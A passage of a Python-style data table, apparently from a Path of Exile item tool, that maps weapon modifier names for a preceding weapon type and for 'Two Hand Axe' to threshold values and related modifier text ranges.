"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(10, '2% increased Damage per Endurance Charge'), (50, '(3 - 4)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(10, '2% increased Damage per Frenzy Charge'), (50, '(3 - 4)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(10, '2% increased Damage per Power Charge'), (50, '(3 - 4)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(70, '(15 - 18)% increased Damage'), (140, '(19 - 22)% increased Damage'), (500, '(23 - 26)% increased Damage')],
"#% increased Damage with Bleeding": [(45, '(14 - 18)% increased Damage with Bleeding'), (90, '(19 - 23)% increased Damage with Bleeding'), (200, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% increased Damage with Poison": [(45, '(14 - 18)% increased Damage with Poison'), (90, '(19 - 23)% increased Damage with Poison'), (200, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% increased Elemental Damage": [(70, '(17 - 19)% increased Elemental Damage'), (140, '(20 - 22)% increased Elemental Damage'), (500, '(23 - 26)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(18 - 20)% increased Fire Damage'), (160, '(21 - 23)% increased Fire Damage'), (220, '(24 - 26)% increased Fire Damage'), (280, '(27 - 30)% increased Fire Damage'), (1000, '(10 - 15)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 3% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(18 - 20)% increased Lightning Damage'), (160, '(21 - 23)% increased Lightning Damage'), (220, '(24 - 26)% increased Lightning Damage'), (280, '(27 - 30)% increased Lightning Damage'), (1000, '(10 - 15)% increased Conductivity Curse Effect')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Poison Duration": [(20, '(14 - 18)% increased Damage with Poison'), (40, '(19 - 23)% increased Damage with Poison'), (100, '(24 - 28)% increased Damage with Poison\n(8 - 12)% increased Poison Duration')],
"#% increased Spell Damage": [(90, '(16 - 18)% increased Spell Damage'), (180, '(19 - 22)% increased Spell Damage'), (270, '(23 - 26)% increased Spell Damage'), (300, '(31 - 35)% increased Spell Damage'), (1000, 'Spells have a (8 - 10)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(0.67, '(4 - 5)% increased maximum Energy Shield'), (1.33, '(6 - 7)% increased maximum Energy Shield'), (8.33, '(8 - 10)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.2% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '1.5% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '0.5% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '(5 - 10)% chance to gain a Frenzy Charge on Kill')],
"#% reduced Enemy Stun Threshold": [(30, '(5 - 6)% reduced Enemy Stun Threshold'), (35, '(7 - 8)% reduced Enemy Stun Threshold'), (200, '(9 - 10)% reduced Enemy Stun Threshold')],
"#% reduced Soul Cost of Vaal Skills": [(25, 'Vaal Skills deal (25 - 30)% increased Damage'), (50, 'Vaal Skills deal (31 - 35)% increased Damage'), (100, '(40 - 50)% increased Attack Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(25 - 30) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(600, '(7 - 9)% increased Armour'), (1200, '(10 - 12)% increased Armour'), (5000, '(13 - 15)% increased Armour')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, 'Adds (1 - 2) to (3 - 4) Cold Damage to Attacks with this Weapon per 10 Dexterity')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(600, '(7 - 9)% increased Evasion Rating'), (1200, '(10 - 12)% increased Evasion Rating'), (5000, '(13 - 15)% increased Evasion Rating')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, 'Adds (1 - 2) to (3 - 4) Fire Damage to Attacks with this Weapon per 10 Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Weapon range": [(7, '1 to Weapon range'), (20, '2 to Weapon range')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(40, '(15 - 17) to Global Critical Strike Multiplier'), (80, '(18 - 20) to Global Critical Strike Multiplier'), (150, '(21 - 23) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(200, 'Adds (4 - 9) to (11 - 21) Chaos Damage'), (320, 'Adds (10 - 18) to (22 - 34) Chaos Damage'), (1000, 'Adds (19 - 28) to (35 - 49) Chaos Damage')],
"Adds # to # Cold Damage": [(50, 'Adds (3 - 6) to (7 - 11) Cold Damage'), (100, 'Adds (7 - 10) to (12 - 18) Cold Damage'), (150, 'Adds (11 - 15) to (19 - 26) Cold Damage'), (200, 'Adds (16 - 20) to (27 - 35) Cold Damage'), (1000, 'Adds (21 - 25) to (36 - 43) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(60, 'Adds (3 - 5) to (5 - 8) Cold Damage to Spells'), (120, 'Adds (5 - 7) to (9 - 13) Cold Damage to Spells'), (160, 'Adds (8 - 11) to (14 - 19) Cold Damage to Spells'), (180, 'Adds (12 - 14) to (19 - 25) Cold Damage to Spells'), (1000, 'Adds (15 - 18) to (26 - 31) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(80, 'Adds (4 - 8) to (9 - 15) Fire Damage'), (160, 'Adds (9 - 12) to (16 - 23) Fire Damage'), (210, 'Adds (13 - 18) to (24 - 31) Fire Damage'), (250, 'Adds (19 - 24) to (32 - 43) Fire Damage'), (1000, 'Adds (25 - 30) to (44 - 53) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(75, 'Adds (3 - 6) to (7 - 11) Fire Damage to Spells'), (150, 'Adds (7 - 9) to (12 - 17) Fire Damage to Spells'), (200, 'Adds (10 - 13) to (17 - 22) Fire Damage to Spells'), (230, 'Adds (14 - 17) to (23 - 31) Fire Damage to Spells'), (1000, 'Adds (18 - 21) to (31 - 38) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(150, 'Adds 1 to (16 - 25) Lightning Damage'), (300, 'Adds (1 - 2) to (26 - 40) Lightning Damage'), (375, 'Adds (1 - 3) to (41 - 55) Lightning Damage'), (430, 'Adds (2 - 5) to (56 - 70) Lightning Damage'), (1000, 'Adds (2 - 6) to (71 - 83) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(100, 'Adds 1 to (12 - 18) Lightning Damage to Spells'), (200, 'Adds (1 - 2) to (19 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 39) Lightning Damage to Spells'), (370, 'Adds (2 - 4) to (40 - 49) Lightning Damage to Spells'), (1000, 'Adds (2 - 5) to (50 - 59) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(40, 'Adds 1 to 2 Physical Damage'), (80, 'Adds (2 - 3) to (3 - 4) Physical Damage'), (120, 'Adds (3 - 4) to (5 - 6) Physical Damage'), (135, 'Adds (5 - 6) to (7 - 8) Physical Damage'), (500, 'Adds (6 - 7) to (9 - 10) Physical Damage')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(15 - 17)% increased Chaos Damage'), (44, '(18 - 20)% increased Chaos Damage'), (100, '(21 - 23)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(17 - 19)% increased Elemental Damage'), (44, '(20 - 22)% increased Elemental Damage'), (100, '(23 - 26)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(3, 'You and Allies affected by your Aura Skills deal (7 - 9)% increased Damage'), (5, 'You and Allies affected by your Aura Skills deal (10 - 12)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (13 - 15)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(18 - 20)% increased Chaos Damage'), (22, '(21 - 23)% increased Chaos Damage'), (50, '(24 - 26)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(11, '(21 - 23)% increased Cold Damage'), (22, '(24 - 26)% increased Cold Damage'), (50, '(27 - 30)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(11, '(21 - 23)% increased Lightning Damage'), (22, '(24 - 26)% increased Lightning Damage'), (50, '(27 - 30)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Cold Damage'), (32, '(24 - 26)% increased Cold Damage'), (100, '(27 - 30)% increased Cold Damage\nGain (4 - 6)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Fire Damage'), (32, '(24 - 26)% increased Fire Damage'), (100, '(27 - 30)% increased Fire Damage\nGain (4 - 6)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Lightning Damage'), (32, '(24 - 26)% increased Lightning Damage'), (100, '(27 - 30)% increased Lightning Damage\nGain (4 - 6)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(5, '(15 - 17)% increased Chaos Damage'), (10, '(18 - 20)% increased Chaos Damage'), (50, '(21 - 23)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(16, '(19 - 22)% increased Global Physical Damage'), (32, '(23 - 26)% increased Global Physical Damage'), (100, '(27 - 30)% increased Global Physical Damage\nGain (4 - 6)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(44, '(23 - 26)% increased Attack Damage'), (88, '(27 - 30)% increased Attack Damage'), (200, '(31 - 35)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(44, '(23 - 26)% increased Spell Damage'), (88, '(27 - 30)% increased Spell Damage'), (200, '(31 - 35)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(15 - 17)% increased Chaos Damage'), (2, '(18 - 20)% increased Chaos Damage'), (10, '(21 - 23)% increased Chaos Damage')],
},
"Two Hand Axe": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (30 - 35)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (30 - 35)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(33 - 36)% increased Fire Damage'), (22, '(37 - 40)% increased Fire Damage'), (50, '(41 - 44)% increased Fire Damage')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (27 - 32)% increased Spell Damage'), (500, 'Triggered Spells deal (33 - 38)% increased Spell Damage')],
"#% chance to cause Bleeding on Hit": [(50, '(14 - 18)% increased Damage with Bleeding'), (100, '(19 - 23)% increased Damage with Bleeding'), (300, '(24 - 28)% increased Damage with Bleeding\n(15 - 20)% chance to cause Bleeding on Hit')],
"#% chance to deal Double Damage": [(18, '4% chance to deal Double Damage'), (50, '5% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(90, '(29 - 35)% increased Attack Damage\n(29 - 35)% increased Spell Damage'), (200, '(36 - 44)% increased Attack Damage\n(36 - 44)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(44, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(56, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% increased Bleeding Duration": [(20, '(14 - 18)% increased Damage with Bleeding'), (40, '(19 - 23)% increased Damage with Bleeding'), (100, '(24 - 28)% increased Damage with Bleeding\n(8 - 12)% increased Bleeding Duration')],
"#% increased Chaos Damage": [(110, '(29 - 32)% increased Chaos Damage'), (220, '(33 - 36)% increased Chaos Damage'), (500, '(37 - 40)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(29 - 32)% increased Cold Damage'), (200, '(33 - 36)% increased Cold Damage'), (300, '(37 - 40)% increased Cold Damage'), (350, '(41 - 44)% increased Cold Damage'), (1000, '(20 - 30)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(16, '2% increased Damage per Endurance Charge'), (50, '(4 - 5)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(16, '2% increased Damage per Frenzy Charge'), (50, '(4 - 5)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(16, '2% increased Damage per Power Charge'), (50, '(4 - 5)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(130, '(21 - 26)% increased Damage'), (260, '(27 - 32)% increased Damage'), (500, '(33 - 38)% increased Damage')],
"#% increased Damage with Bleeding": [(45, '(14 - 18)% increased Damage with Bleeding'), (90, '(19 - 23)% increased Damage with Bleeding'), (200, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (30 - 35)% faster')],
"#% increased Elemental Damage": [(130, '(21 - 26)% increased Elemental Damage'), (260, '(27 - 32)% increased Elemental Damage'), (500, '(33 - 38)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(29 - 32)% increased Fire Damage'), (200, '(33 - 36)% increased Fire Damage'), (300, '(37 - 40)% increased Fire Damage'), (350, '(41 - 44)% increased Fire Damage'), (1000, '(20 - 30)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 5% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(29 - 32)% increased Lightning Damage'), (200, '(33 - 36)% increased Lightning Damage'), (300, '(37 - 40)% increased Lightning Damage'), (350, '(41 - 44)% increased Lightning Damage'), (1000, '(20 - 30)% increased Conductivity Curse Effect')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Spell Damage": [(125, '(22 - 24)% increased Spell Damage'), (250, '(25 - 28)% increased Spell Damage'), (375, '(29 - 35)% increased Spell Damage'), (420, '(45 - 51)% increased Spell Damage'), (1000, 'Spells have a (16 - 18)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(1.17, '(7 - 9)% increased maximum Energy Shield'), (2.33, '(10 - 13)% increased maximum Energy Shield'), (8.33, '(14 - 16)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.4% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '3.0% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '1.0% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '1 to Maximum Endurance Charges')],
"#% reduced Enemy Stun Threshold": [(30, '(5 - 6)% reduced Enemy Stun Threshold'), (35, '(7 - 8)% reduced Enemy Stun Threshold'), (200, '(9 - 10)% reduced Enemy Stun Threshold')],
"#% reduced Soul Cost of Vaal Skills": [(55, 'Vaal Skills deal (36 - 44)% increased Damage'), (110, 'Vaal Skills deal (45 - 51)% increased Damage'), (200, '(60 - 70)% increased Attack Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(45 - 50) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(1100, '(14 - 16)% increased Armour'), (2200, '(17 - 19)% increased Armour'), (5000, '(20 - 22)% increased Armour')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(1100, '(14 - 16)% increased Evasion Rating'), (2200, '(17 - 19)% increased Evasion Rating'), (5000, '(20 - 22)% increased Evasion Rating')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
